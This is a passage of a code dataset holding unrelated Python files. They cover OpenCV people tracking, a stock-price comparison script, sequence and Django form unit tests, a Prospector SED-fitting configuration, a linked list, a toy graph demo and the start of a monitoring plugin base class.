2) # top-left x\n y = int(center_y - h / 2) # top-left y\n\n boxes.append([x, y, w, h]) # keep appending boxes to the list\n\n confidences.append(float(confidence))\n\n indexes = cv2.dnn.NMSBoxes(boxes, confidences, min_confidence, 0.4) # non-maximum suppression to drop duplicate boxes\n for i in range(len(boxes)):\n if i in indexes:\n x, y, w, h = boxes[i]\n rects.append([x, y, x+w, y+h]) # there may or may not be overlapping detections within these boxes\n label = '{:,.2%}'.format(confidences[i])\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 1) # draw the bounding box\n cv2.putText(frame, label, (x + 5, y + 15), cv2.FONT_HERSHEY_PLAIN, 1, (0, 255, 0), 1)\n\n # use Tracker\n objects = tracker.update(rects)\n total = len(objects)\n # loop over the trackable objects\n # each entry gives an object ID and its centroid coordinates\n for (objectID, centroid) in objects.items():\n # check if a trackable object exists with the object ID,\n # i.e. whether this object is already being tracked\n trackable = trackables.get(objectID, None)\n\n # if the ID is new, create a Trackable object for it\n if trackable is None:\n trackable = Trackable(objectID, centroid)\n\n\n # store the trackable object in our dictionary\n trackables[objectID] = trackable\n text = \"ID {}\".format(objectID)\n cv2.putText(frame, text, (centroid[0] + 10, centroid[1] + 10),\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)\n cv2.circle(frame, (centroid[0], centroid[1]), 4, (0, 255, 0), -1)\n\n info = [\n (\"total\", total),\n ]\n\n # loop over the info tuples and draw them on our frame\n for (i, (k, v)) in enumerate(info):\n text = \"{}: {}\".format(k, v)\n cv2.putText(frame, text, (10, height - ((i * 20) + 20)),\n cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 255, 0), 2)\n\n if total >= 1:\n writeFrame(frame)\n\n # show the output frame\n dt=time.time()-start_time\n timeStamp=time.time()\n fps=1/dt\n fpsFilt=.9*fpsFilt + .1*fps\n #print(str(round(fps,1))+' fps')\n cv2.putText(frame,str(round(fpsFilt,1))+' fps',(0,30),font,1,(0,0,255),2)\n \n cv2.putText(frame, str(writer_frame_count) + ' frame', (10, height - ((i * 20) + 50)),\n cv2.FONT_HERSHEY_SIMPLEX, 0.6, (255, 255, 0), 2)\n cv2.imshow(\"Frame\", frame)\n frame_time = time.time() - start_time\n print(\"Frame {} time {}\".format(frame_count, frame_time))\n \n key = cv2.waitKey(1) & 0xFF\n\n #if total >=1:\n #writer2.write(cp_frame)\n # if the `q` key was pressed, break from the loop\n if key == ord(\"q\"):\n break\n
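\n# aside: the fps readout above smooths the instantaneous fps with an exponential moving\n# average; a purely illustrative trace with made-up samples (not executed here):\n# ema = 0.0\n# for sample in (30.0, 30.0, 30.0):\n# ema = 0.9 * ema + 0.1 * sample # -> 3.0, 5.7, 8.13, converging towards ~30\n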
\nvs.release()\nwriter.release()\ncv2.destroyAllWindows()\n","sub_path":"board/src/peopleDetct/src/object_tracking_people.py","file_name":"object_tracking_people.py","file_ext":"py","file_size_in_byte":6483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"28726542","text":"# Build a program that analyses data for certain companies (user input) and plots them against each other.\n\n# The user must be able to pick companies from a list of options, and the program must find the intersections\n# between the two price series. It must allow this information to be plotted graphically, and store the dates\n# on which the intersections occurred in an Excel file.\nimport pandas as pd\nimport pandas_datareader as pdr\nimport matplotlib.pyplot as plt\nimport datetime \nimport numpy as np\n\n\n\n\npregunta=(input(\"desea ingresar al sistema?\"))\n\nwhile pregunta == \"si\" or pregunta == \"SI\" or pregunta == \"Si\":\n\n print(\"BIENVENIDO PROGRAMA DE COMPARACION DE ACCIONES MERCADO FINANCIERO\")\n print(\"\\n\")\n print(\"Seleccione empresas de la lista en mayuscula\" )\n\n empresas = [\"AAPL\", \"AIG\", \"AMZN\", \"AXP\", \"BA\", \"BAC\", \"CAJ\", \"CAT\", \"CL\", \"CMCSA\", \"COP\", \"CSCO\", \"CVC\", \"CVS\", \"CVX\", \"DD\", \"DELL\",\n \"F\", \"GD\", \"GE\", \"GS\", \"GSK\", \"HD\", \"HMC\", \"HPQ\", \"IBM\", \"JPM\", \"K\", \"KMB\", \"KO\", \"MAR\", \"MCD\", \"MMM\", \"MSFT\", \"NAV\", \n \"NOC\", \"NVS\", \"PEP\", \"PFE\", \"PG\", \"R\", \"RTN\",\"SAP\", \"SNE\", \"SNY\", \"TM\", \"TOT\", \"TWX\", \"TXN\", \"TSLA\", \"UN\", \"VLO\", \"WFC\", \"WMT\", \"XOM\", \"XRX\",\"YHOO\"]\n print(empresas)\n\n empresa = str(input(\"Ingrese empresa a comparar: \"))\n\n if empresa in empresas:\n \n empresa2= str(input(\"Ingrese segunda empresa a comparar: \"))\n\n if empresa2 in empresas and empresa != empresa2:\n # inside this if we build the comparison and the plots for the two chosen companies,\n # showing the first in blue and the second in red\n\n # function to validate the end date the user wants\n def comprobar_fechain(fechain):\n try:\n datetime.datetime.strptime(fechain, \"%d-%m-%Y\")\n except:\n return \"El formato debe ser DD-MM-YYYY\"\n return datetime.datetime.strptime(fechain, '%d-%m-%Y')\n\n fechain = input(\"Dame fecha hasta donde quiere comparar precios\")\n\n print (comprobar_fechain(fechain))\n\n # function to validate the start date the user wants\n def comprobar_fechaout(fechaout):\n try:\n datetime.datetime.strptime(fechaout, \"%d-%m-%Y\")\n except:\n return \"El formato debe ser DD-MM-YYYY\"\n return datetime.datetime.strptime(fechaout, '%d-%m-%Y')\n\n fechaout = input(\"Dame una fecha de inicio de donde quiere comparar precios\") \n\n print (comprobar_fechaout(fechaout))\n \n # define the date range for our plots\n end = datetime.datetime.strptime(fechain, \"%d-%m-%Y\").isoformat()\n start = datetime.datetime.strptime(fechaout, \"%d-%m-%Y\").isoformat()\n print(start,end)\n\n # fetch the stock series\n y=empresa\n stock1 = pdr.get_data_yahoo(y, start=start, end=end)\n close1 = stock1['Close']\n print(stock1)\n \n x=empresa2\n stock2 = pdr.get_data_yahoo(x, start=start, end=end)\n close2 = stock2['Close'] \n print(stock2)\n\n # plot our series\n plt.plot(close1, color='b', label=empresa)\n plt.plot(close2, color='r', label=empresa2)\n plt.legend() # show all the labels\n plt.show() # draw the two overlaid plots\n\n df = pd.read_csv('AAPL.csv')\n \n\n # resultado = list(filter(lambda n: n in empresa, empresa2))\n #print(resultado)\n\n else:\n print(\"Ingrese una 
empresa de la lista y no repetir\") \n\n else:\n print(\"Debe ingresar el nombre de empresas de la lista para que el programa funcione\")\n\n last=input(\"Desea hacer otra consulta?\")\n\n if last == \"no\" or last == \"NO\" or last == \"No\" or last == \"nO\":\n break\n print(\"Muchas gracias\")\nelse: \n print(\"Muchas gracias\")\n","sub_path":"nuevo.py","file_name":"nuevo.py","file_ext":"py","file_size_in_byte":3954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"640188144","text":"import unittest\n\nfrom shape_tfds.core.collection_utils import sequence\n\n\nclass SequenceTest(unittest.TestCase):\n def test_dict_sequence(self):\n x = [0, 1, 2, 3]\n y = [10, 11, 12, 13]\n dict_seq = sequence.DictSequence(x=x, y=y)\n self.assertEqual(dict_seq[2], dict(x=2, y=12))\n self.assertEqual(len(dict_seq), 4)\n\n def test_zipped_sequence(self):\n x = [0, 1, 2, 3]\n y = [10, 11, 12, 13]\n zipped = sequence.ZippedSequence(x, y)\n self.assertEqual(zipped[2], (2, 12))\n self.assertEqual(len(zipped), 4)\n\n def test_mapped_sequence(self):\n base = range(5)\n mapped = sequence.MappedSequence(base, lambda x: x ** 2)\n self.assertEqual(list(mapped), [x ** 2 for x in base])\n self.assertEqual(mapped[3], 9)\n\n def test_map(self):\n self.assertEqual(\n list(sequence.Sequence.wrapped(range(5)).map(lambda x: x + 1)),\n list(range(1, 6)),\n )\n self.assertEqual(\n list(sequence.Sequence.mapped(range(5), lambda x: x + 1)), list(range(1, 6))\n )\n\n def test_zipped(self):\n zipped = sequence.Sequence.zipped(x=[], y=[])\n self.assertIsInstance(zipped, sequence.DictSequence)\n zipped = sequence.Sequence.zipped([], [])\n self.assertIsInstance(zipped, sequence.ZippedSequence)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"shape_tfds/core/collection_utils/sequence_test.py","file_name":"sequence_test.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"7894674","text":"from django.forms import forms\nfrom django.test import TestCase\n\nfrom web3 import Web3\n\nfrom ..filters import EthereumAddressFieldForm, Keccak256FieldForm\n\n\nclass EthereumAddressForm(forms.Form):\n value = EthereumAddressFieldForm()\n\n\nclass Keccak256Form(forms.Form):\n value = Keccak256FieldForm()\n\n\nclass TestForms(TestCase):\n def test_ethereum_address_field_form(self):\n form = EthereumAddressForm(data={\"value\": \"not a ethereum address\"})\n self.assertFalse(form.is_valid())\n self.assertEqual(\n form.errors[\"value\"], [\"Enter a valid checksummed Ethereum Address.\"]\n )\n\n form = EthereumAddressForm(\n data={\"value\": \"0xbaa7df320f385318fe3409cc95db48de60dfa033\"}\n )\n self.assertFalse(form.is_valid())\n self.assertEqual(\n form.errors[\"value\"], [\"Enter a valid checksummed Ethereum Address.\"]\n )\n\n form = EthereumAddressForm(\n data={\"value\": \"0xbaa7df320f385318fE3409CC95Db48DE60dfA033\"}\n )\n self.assertTrue(form.is_valid())\n\n def test_keccak256_field_form(self):\n form = Keccak256Form(data={\"value\": \"not a hash\"})\n self.assertFalse(form.is_valid())\n self.assertEqual(\n form.errors[\"value\"], ['\"not a hash\" is not a valid keccak256 hash.']\n )\n\n form = Keccak256Form(data={\"value\": \"0x1234\"})\n self.assertFalse(form.is_valid())\n self.assertEqual(\n form.errors[\"value\"], ['\"0x1234\" keccak256 hash should be 32 bytes.']\n )\n\n form = Keccak256Form(data={\"value\": Web3.keccak(text=\"testing\").hex()})\n 
self.assertTrue(form.is_valid())\n","sub_path":"gnosis/eth/django/tests/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"264326623","text":"import numpy as np\nimport sys, os\nfrom prospect.models import priors, sedmodel\nfrom prospect.sources import FastStepBasis\nfrom sedpy.observate import load_filters\nfrom prospect.models.templates import adjust_dirichlet_agebins\nfrom scipy.stats import truncnorm\n\n\n\n#############\n# RUN_PARAMS\n#############\n\nrun_params = {'verbose':True,\n 'debug': False,\n 'sed_file': sys.argv[2],\n 'outfile': sys.argv[3],\n # dynesty params\n 'nested_bound': 'multi', # bounding method\n 'nested_sample': 'auto', # sampling method\n 'nested_walks': 50, # MC walks\n 'nested_nlive_batch': 200, # size of live point \"batches\"\n 'nested_nlive_init': 200, # number of initial live points\n 'nested_weight_kwargs': {'pfrac': 1.0}, # weight posterior over evidence by 100%\n 'nested_dlogz_init': 0.01,\n }\n\n############\n# OBS\n#############\n\n\n\ngalex = ['galex_FUV']\nhst_wfc3_uv = ['wfc3_uvis_f275w', 'wfc3_uvis_f336w', 'wfc3_uvis_f475w','wfc3_uvis_f555w', 'wfc3_uvis_f606w', 'wfc3_uvis_f814w']\nsdss = ['sdss_i0']\nhst_wfc3_ir = ['wfc3_ir_f105w', 'wfc3_ir_f125w', 'wfc3_ir_f140w', 'wfc3_ir_f160w']\nspitzer_mips = ['spitzer_mips_24']\n\nherschel_pacs = ['herschel_pacs_70', 'herschel_pacs_100', 'herschel_pacs_160']\nherschel_spire = ['herschel_spire_250', 'herschel_spire_350', 'herschel_spire_500']\n\nfilternames = (galex + hst_wfc3_uv + sdss + hst_wfc3_ir + spitzer_mips + herschel_pacs + herschel_spire)\n\n\ndef load_obs(sed_file = run_params['sed_file'], **kwargs):\n\n from hyperion.model import ModelOutput\n from astropy.cosmology import Planck15\n from astropy import units as u\n from astropy import constants\n m = ModelOutput(sed_file)\n\n wav,flux = m.get_sed(inclination='all',aperture=-1)\n wav = np.asarray(wav)*u.micron #wav is in micron \n wav = wav.to(u.AA)\n #wav *= (1.+z) \n flux = np.asarray(flux)*u.erg/u.s\n dl = 10.0*u.pc\n #dl = Planck15.luminosity_distance(z) \n dl = dl.to(u.cm)\n flux /= (4.*3.14*dl**2.)\n nu = constants.c.cgs/(wav.to(u.cm))\n nu = nu.to(u.Hz)\n\n flux /= nu\n flux = flux.to(u.Jy)\n maggies = flux[0] / 3631.\n\n\n filters = load_filters(filternames)\n filter_wavs = [x.wave_mean for x in filters]\n\n flx = []\n flxe = []\n for i in range(len(filter_wavs)):\n flx.append(maggies[(np.abs(wav.value - filter_wavs[i])).argmin()].value)\n flxe.append(0.01* flx[i])\n flx = np.asarray(flx)\n flxe = np.asarray(flxe)\n\n\n flux_mag = flx\n unc_mag = flxe\n\n obs = {}\n obs['filters'] = filters\n # This is a list of maggies, converted from mJy. It should have the same \n # order as `filters` above. \n obs['maggies'] = flux_mag\n #Uncertainties also converted from mJy. In same order as flux_mag and filters \n obs['maggies_unc'] = unc_mag\n # Here we mask out any NaNs or infs \n obs['phot_mask'] = np.isfinite(flux_mag)\n # We have no spectrum. 
\n obs['wavelength'] = None\n\n return obs\n\n##########################\n# TRANSFORMATION FUNCTIONS\n##########################\ndef load_gp(**extras):\n return None, None\n\ndef tie_gas_logz(logzsol=None, **extras):\n return logzsol\n\ndef to_dust1(dust1_fraction=None, dust1=None, dust2=None, **extras):\n return dust1_fraction*dust2\n\ndef massmet_to_logmass(massmet=None,**extras):\n return massmet[0]\n\ndef massmet_to_logzsol(massmet=None,**extras):\n return massmet[1]\n\ndef logmass_to_masses(massmet=None, logsfr_ratios=None, agebins=None, **extras):\n logsfr_ratios = np.clip(logsfr_ratios,-10,10) # numerical issues...\n nbins = agebins.shape[0]\n sratios = 10**logsfr_ratios\n dt = (10**agebins[:,1]-10**agebins[:,0])\n coeffs = np.array([ (1./np.prod(sratios[:i])) * (np.prod(dt[1:i+1]) / np.prod(dt[:i])) for i in range(nbins)])\n m1 = (10**massmet[0]) / coeffs.sum()\n\n return m1 * coeffs\n\n\ndef zfrac_to_masses(massmet=None, z_fraction=None, agebins=None, **extras):\n \"\"\"This transforms from independent dimensionless `z` variables to sfr\n fractions and then to bin mass fractions. The transformation is such that\n sfr fractions are drawn from a Dirichlet prior. See Betancourt et al. 2010\n and Leja et al. 2017\n :param massmet:\n massmet[0] is the log of the total mass formed over all bins in the SFH.\n :param z_fraction:\n latent variables drawn from a specific set of Beta distributions. (see\n Betancourt 2010)\n :returns masses:\n The stellar mass formed in each age bin.\n \"\"\"\n # sfr fractions\n sfr_fraction = np.zeros(len(z_fraction) + 1)\n sfr_fraction[0] = 1.0 - z_fraction[0]\n for i in range(1, len(z_fraction)):\n sfr_fraction[i] = np.prod(z_fraction[:i]) * (1.0 - z_fraction[i])\n sfr_fraction[-1] = 1 - np.sum(sfr_fraction[:-1])\n\n # convert to mass fractions\n time_per_bin = np.diff(10**agebins, axis=-1)[:, 0]\n mass_fraction = sfr_fraction * np.array(time_per_bin)\n mass_fraction /= mass_fraction.sum()\n\n masses = (10**massmet[0]) * mass_fraction\n return masses\n
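\n# (illustrative, not executed: for three age bins and z_fraction = [0.5, 0.5], the loop\n# above yields sfr_fraction = [0.5, 0.25, 0.25]; each bin's mass is then that fraction\n# weighted by the bin's linear width time_per_bin and scaled to the total 10**massmet[0])\n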
\"init\": 0, \"units\": \"FSPS index\"})\n\nmodel_params.append({'name': \"mass\", 'N': 3, 'isfree': False, 'init': 1., 'units': r'M$_\\odot$',\n 'depends_on': zfrac_to_masses})\n\nmodel_params.append({'name': \"agebins\", 'N': 1, 'isfree': False,\n 'init': [],\n 'units': 'log(yr)'})\n\nmodel_params.append({'name': \"z_fraction\", \"N\": 2, 'isfree': True, 'init': [0, 0], 'units': None,\n 'prior': priors.Beta(alpha=1.0, beta=1.0, mini=0.0, maxi=1.0)})\n\n\n\n\n\n\n\n######## IMF ##############\nmodel_params.append({'name': 'imf_type', 'N': 1,\n 'isfree': False,\n 'init': 2, #Kroupa\n 'prior': ' '\n })\n\n######## Dust Absorption ##############\nmodel_params.append({'name': 'dust_type', 'N': 1,\n 'isfree': False,\n 'init': 4,\n 'units': 'index', 'prior': None})\n \nmodel_params.append({'name': 'dust1', 'N': 1,\n 'isfree': False,\n 'depends_on': to_dust1,\n 'init': 1.0,\n 'units': '', 'prior': None})\n\nmodel_params.append({'name': 'dust1_fraction', 'N': 1,\n 'isfree': True,\n 'init': 1.0,\n 'init_disp': 0.8,\n 'disp_floor': 0.8,\n 'units': '',\n 'prior': priors.ClippedNormal(mini=0.0, maxi=2.0, mean=1.0, sigma=0.3)})\n\nmodel_params.append({'name': 'dust2', 'N': 1,\n 'isfree': True,\n 'init': 1.0,\n 'init_disp': 0.25,\n 'disp_floor': 0.15,\n 'units': '',\n 'prior': priors.ClippedNormal(mini=0.0, maxi=4.0, mean=0.3, sigma=1)})\n\nmodel_params.append({'name': 'dust_index', 'N': 1,\n 'isfree': True,\n 'init': 0.0,\n 'init_disp': 0.25,\n 'disp_floor': 0.15,\n 'units': '',\n 'prior': priors.TopHat(mini=-1.0, maxi=0.4)})\n\nmodel_params.append({'name': 'dust1_index', 'N': 1,\n 'isfree': False,\n 'init': -1.0,\n 'units': '', 'prior': None})\n\nmodel_params.append({'name': 'dust_tesc', 'N': 1,\n 'isfree': False,\n 'init': 7.0,\n 'units': 'log(Gyr)', 'prior': None})\n\n###### Dust Emission ##############\nmodel_params.append({'name': 'add_dust_emission', 'N': 1,\n 'isfree': False,\n 'init': 1,\n 'units': None, 'prior': None})\n\nmodel_params.append({'name': 'duste_gamma', 'N': 1,\n 'isfree': True,\n 'init': 0.01,\n 'init_disp': 0.2,\n 'disp_floor': 0.15,\n 'units': None,\n 'prior': priors.TopHat(mini=0.0, maxi=1.0)})\n\nmodel_params.append({'name': 'duste_umin', 'N': 1,\n 'isfree': True,\n 'init': 1.0,\n 'init_disp': 5.0,\n 'disp_floor': 4.5,\n 'units': None,\n 'prior': priors.TopHat(mini=0.1, maxi=25.0)})\n\nmodel_params.append({'name': 'duste_qpah', 'N': 1,\n 'isfree': True,\n 'init': 2.0,\n 'init_disp': 3.0,\n 'disp_floor': 3.0,\n 'units': 'percent',\n 'prior': priors.TopHat(mini=0.0, maxi=7.0)})\n\n\n\n####### Units ##########\nmodel_params.append({'name': 'peraa', 'N': 1,\n 'isfree': False,\n 'init': False, 'prior': None})\n\nmodel_params.append({'name': 'mass_units', 'N': 1,\n 'isfree': False,\n 'init': 'mformed', 'prior': None})\n\n#### resort list of parameters for later display purposes\n#parnames = [m['name'] for m in model_params]\n#fit_order = ['massmet','logsfr_ratios', 'dust2', 'dust_index', 'dust1_fraction', 'duste_gamma', 'duste_umi#n', 'duste_qpah']\n#tparams = [model_params[parnames.index(i)] for i in fit_order]\n#for param in model_params: \n# if param['name'] not in fit_order:\n# tparams.append(param)\n#model_params = tparams\n\n\n\n\n\n##### Mass-metallicity prior ######\nclass MassMet(priors.Prior):\n \"\"\"A Gaussian prior designed to approximate the Gallazzi et al. 
2005 \n stellar mass--stellar metallicity relationship.\n \"\"\"\n\n prior_params = ['mass_mini', 'mass_maxi', 'z_mini', 'z_maxi']\n distribution = truncnorm\n massmet = np.loadtxt('/ufrc/narayanan/s.lower/simSEDs/simbam25n512_newfof/snap305_massmetal/gallazzi_05_massmet.txt')\n\n def __len__(self):\n \"\"\" Hack to work with Prospector 0.3\n \"\"\"\n return 2\n\n def scale(self,mass):\n upper_84 = np.interp(mass, self.massmet[:,0], self.massmet[:,3]) \n lower_16 = np.interp(mass, self.massmet[:,0], self.massmet[:,2])\n return (upper_84-lower_16)\n\n def loc(self,mass):\n return np.interp(mass, self.massmet[:,0], self.massmet[:,1])\n\n def get_args(self,mass):\n a = (self.params['z_mini'] - self.loc(mass)) / self.scale(mass)\n b = (self.params['z_maxi'] - self.loc(mass)) / self.scale(mass)\n return [a, b]\n\n @property\n def range(self):\n return ((self.params['mass_mini'], self.params['mass_maxi']),\\\n (self.params['z_mini'], self.params['z_maxi']))\n\n def bounds(self, **kwargs):\n if len(kwargs) > 0:\n self.update(**kwargs)\n return self.range\n\n def __call__(self, x, **kwargs):\n \"\"\"Compute the value of the probability density function at x and\n return the ln of that.\n\n :params x:\n x[0] = mass, x[1] = metallicity. Used to calculate the prior\n\n :param kwargs: optional\n All extra keyword arguments are used to update the `prior_params`.\n\n :returns lnp:\n The natural log of the prior probability at x, scalar or ndarray of\n same length as the prior object.\n \"\"\"\n if len(kwargs) > 0:\n self.update(**kwargs)\n p = np.atleast_2d(np.zeros_like(x))\n a, b = self.get_args(x[...,0])\n p[...,1] = self.distribution.pdf(x[...,1], a, b, loc=self.loc(x[...,0]), scale=self.scale(x[...,0]))\n with np.errstate(invalid='ignore'):\n p[...,1] = np.log(p[...,1])\n return p\n\n def sample(self, nsample=None, **kwargs):\n \"\"\"Draw a sample from the prior distribution.\n\n :param nsample: (optional)\n Unused\n \"\"\"\n if len(kwargs) > 0:\n self.update(**kwargs)\n mass = np.random.uniform(low=self.params['mass_mini'],high=self.params['mass_maxi'],size=nsample)\n a, b = self.get_args(mass)\n met = self.distribution.rvs(a, b, loc=self.loc(mass), scale=self.scale(mass), size=nsample)\n\n return np.array([mass, met])\n\n def unit_transform(self, x, **kwargs):\n \"\"\"Go from a value of the CDF (between 0 and 1) to the corresponding\n parameter value.\n\n :param x:\n A scalar or vector of same length as the Prior with values between\n zero and one corresponding to the value of the CDF.\n\n :returns theta:\n The parameter value corresponding to the value of the CDF given by\n `x`.\n \"\"\"\n if len(kwargs) > 0:\n self.update(**kwargs)\n mass = x[0]*(self.params['mass_maxi'] - self.params['mass_mini']) + self.params['mass_mini']\n a, b = self.get_args(mass)\n met = self.distribution.ppf(x[1], a, b, loc=self.loc(mass), scale=self.scale(mass))\n return np.array([mass,met])\n\n\ndef load_sps(**extras):\n\n sps = FastStepBasis(compute_vega_mags=False, zcontinuous=1, **extras)\n return sps\n\n\n\n\n#print(model_params)\ndef load_model(nbins_sfh=10, sigma=0.3, df=2, **extras):\n \n # we'll need this to access specific model parameters\n \n n = [p['name'] for p in model_params]\n \n \n agelims_log = np.array([1e-9, 0.1, 0.5, 1.0, 2.0, 3.0, 4.5, 6.0, 9.0, 13.6])\n agelims = np.asarray(np.log10(agelims_log) + 9)\n \n\n agebins = np.array([agelims[:-1], agelims[1:]]).T\n nbins_sfh = len(agelims_log) - 1\n # load nvariables and agebins\n #model_params[n.index('agebins')]['N'] = nbins_sfh\n 
#model_params[n.index('agebins')]['init'] = agebins\n #model_params[n.index('mass')]['N'] = nbins_sfh\n #model_params[n.index('z_fraction')]['N'] = nbins_sfh-1\n #model_params[n.index('logsfr_ratios')]['init'] = np.full(nbins_sfh-1,0.0) # constant SFH\n #model_params[n.index('logsfr_ratios')]['prior'] = priors.StudentT(mean=np.full(nbins_sfh-1,0.0),\n # scale=np.full(nbins_sfh-1,sigma),\n # df=np.full(nbins_sfh-1,df))\n \n \n\n\n ncomp = nbins_sfh\n # constant SFR\n zinit = np.array([(i-1)/float(i) for i in range(ncomp, 1, -1)])\n\n # Set up the prior in `z` variables that corresponds to a dirichlet in sfr\n # fraction. THIS IS IMPORTANT\n alpha = np.arange(ncomp-1, 0, -1)\n zprior = priors.Beta(alpha=alpha, beta=np.ones_like(alpha), mini=0.0, maxi=1.0)\n\n model_params[n.index('mass')]['N'] = ncomp\n model_params[n.index('agebins')]['N'] = ncomp\n model_params[n.index('agebins')]['init'] = agebins\n model_params[n.index('z_fraction')]['N'] = len(zinit)\n model_params[n.index('z_fraction')]['init'] = zinit\n model_params[n.index('z_fraction')]['prior'] = zprior\n\n\n\n\n\n\n # set mass-metallicity prior\n # insert redshift into model dictionary\n model_params[n.index('massmet')]['prior'] = MassMet(z_mini=-1.98, z_maxi=0.19, mass_mini=7, mass_maxi=13)\n \n #print('\\n\\nmodel params:', model_params)\n\n\n model = sedmodel.SedModel(model_params)\n\n return model\n\n","sub_path":"snap305_massmetal/mass_metal_params.py","file_name":"mass_metal_params.py","file_ext":"py","file_size_in_byte":18044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"574469149","text":"class Node:\r\n def __init__(self, data=None, next=None):\r\n self.data = data\r\n self.next = next\r\n\r\n\r\nclass Linked_list:\r\n def __init__(self):\r\n self.head = None\r\n\r\n def get_length(self):\r\n count = 0\r\n itr = self.head\r\n\r\n while itr:\r\n count += 1\r\n itr = itr.next\r\n\r\n return count\r\n\r\n def insert_at_end(self, data):\r\n node = Node(data, None)\r\n\r\n if self.head == None:\r\n self.head = node\r\n return\r\n\r\n itr = self.head\r\n while itr.next:\r\n itr = itr.next\r\n\r\n itr.next = node\r\n\r\n def insert_at_beginning(self, data):\r\n\r\n if self.head is None:\r\n node = Node(data)\r\n self.head = node\r\n return\r\n\r\n node = Node(data, self.head)\r\n self.head = node\r\n\r\n def insert_at(self, index, data):\r\n if index < 0 or index >= self.get_length():\r\n raise Exception(\"Index out of range\")\r\n\r\n if self.head is None:\r\n node = Node(data)\r\n self.head = node\r\n return\r\n\r\n count = 0\r\n itr = self.head\r\n\r\n while itr:\r\n if count == index:\r\n node = Node(data, itr.next)\r\n itr.next = node\r\n return\r\n count += 1\r\n itr = itr.next\r\n\r\n def remove_node(self, index):\r\n count = 0\r\n\r\n if self.head is None:\r\n print('Linked list is Empty')\r\n return\r\n\r\n if index == 0:\r\n self.head = self.head.next\r\n return\r\n\r\n itr = self.head\r\n while itr:\r\n if count == index - 1:\r\n itr.next = itr.next.next\r\n return\r\n count += 1\r\n itr = itr.next\r\n\r\n def print_linkedlist(self):\r\n itr = self.head\r\n while itr:\r\n print(itr.data, end='-->')\r\n\r\n itr = itr.next\r\n print()\r\n\r\n\r\nl = Linked_list()\r\nl.insert_at_end(0)\r\nl.insert_at_end(1)\r\nl.insert_at_end(2)\r\nl.insert_at_end(3)\r\nl.insert_at(2, 1.5)\r\nl.print_linkedlist()\r\n\r\nl.remove_node(3)\r\nl.print_linkedlist()\r\n","sub_path":"Others/linked_list1.py","file_name":"linked_list1.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} 
+{"seq_id":"469098596","text":"'''\nimport tensorflow as tf\n\nwith tf.Session() as sess:\n a = tf.constant(3, name='a')\n b = tf.constant(5, name='b')\n prod = tf.multiply(a, b, name='Multiply')\n sum = tf.add(a, b, name='Add')\n res = tf.divide(prod, sum, name='divide')\n\n out = sess.run(res)\n print(out)\n'''\n\nimport tf_api as tf\n\n# create default graph\ntf.Graph().as_default()\n\n# construct computational graph by creating some nodes\na = tf.Constant(15)\nb = tf.Constant(5)\nprod = tf.multiply(a, b)\nsum = tf.add(a, b)\nres = tf.divide(prod, sum)\n\n# create a session object\nsession = tf.Session()\n\n# run computational graph to compute the output for 'res'\nout = session.run(res)\nprint(out)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"595632192","text":"\"\"\"\nThis module provides classes and base functionality for building OPQMauka plugins.\n\"\"\"\n\nimport json\nimport logging\nimport multiprocessing\nimport signal\nimport threading\nimport typing\nimport time\nimport os\n\nimport bson\nimport bson.objectid\nimport zmq\n\nimport mongo.mongo\nimport protobuf.opq_pb2 as opqpb\n\n_logger = logging.getLogger(\"app\")\nlogging.basicConfig(\n format=\"[%(levelname)s][%(asctime)s][{} %(filename)s:%(lineno)s - %(funcName)s() ] %(message)s\".format(\n os.getpid()))\n_logger.setLevel(logging.DEBUG)\n\n\ndef run_plugin(plugin_class, config: typing.Dict):\n \"\"\"Runs the given plugin using the given configuration dictionary\n\n :param plugin_class: Name of the class of the plugin to be ran\n :param config: Configuration dictionary\n \"\"\"\n\n def _run_plugin():\n \"\"\"Inner function that acts as target to multiprocess constructor\"\"\"\n plugin_instance = plugin_class(config)\n plugin_instance._run()\n\n process = multiprocessing.Process(target=_run_plugin)\n process.start()\n\nclass JSONEncoder(json.JSONEncoder):\n \"\"\"\n This class allows us to serialize items with ObjectIds to JSON\n \"\"\"\n\n def default(self, o):\n \"\"\"If o is an object id, return the string of it, otherwise use the default encoder for this object\n\n :param o: Object to serialize\n :return: Serialized version of this object\n \"\"\"\n if isinstance(o, bson.ObjectId):\n return str(o)\n return json.JSONEncoder.default(self, o)\n\n\nclass MaukaPlugin:\n \"\"\"\n This is the base MaukaPlugin class that provides easy access to the database and also provides publish/subscribe\n semantics and distributed processing primitives.\n \"\"\"\n\n NAME = \"MaukaPlugin\"\n\n def __init__(self, config: typing.Dict, subscriptions: typing.List[str], name: str, exit_event: multiprocessing.Event):\n \"\"\" Initializes the base plugin\n\n :param config: Configuration dictionary\n :param subscriptions: List of subscriptions this plugin should subscribe to\n :param name: The name of this plugin\n \"\"\"\n\n self.config = config\n \"\"\"Configuration dictionary\"\"\"\n\n self.subscriptions = subscriptions\n \"\"\"Plugin subscriptions\"\"\"\n\n self.name = name\n \"\"\"Plugin name\"\"\"\n\n self.exit_event = exit_event\n \"\"\"Multiprocessing primitive that when set allows us to easily exit a process or thread\"\"\"\n\n self.mongo_client = self.get_mongo_client()\n \"\"\"MongoDB OPQ client\"\"\"\n\n self.zmq_context = zmq.Context()\n \"\"\"ZeroMQ context\"\"\"\n\n self.zmq_consumer = self.zmq_context.socket(zmq.SUB)\n \"\"\"ZeroMQ consumer\"\"\"\n\n self.zmq_producer = 
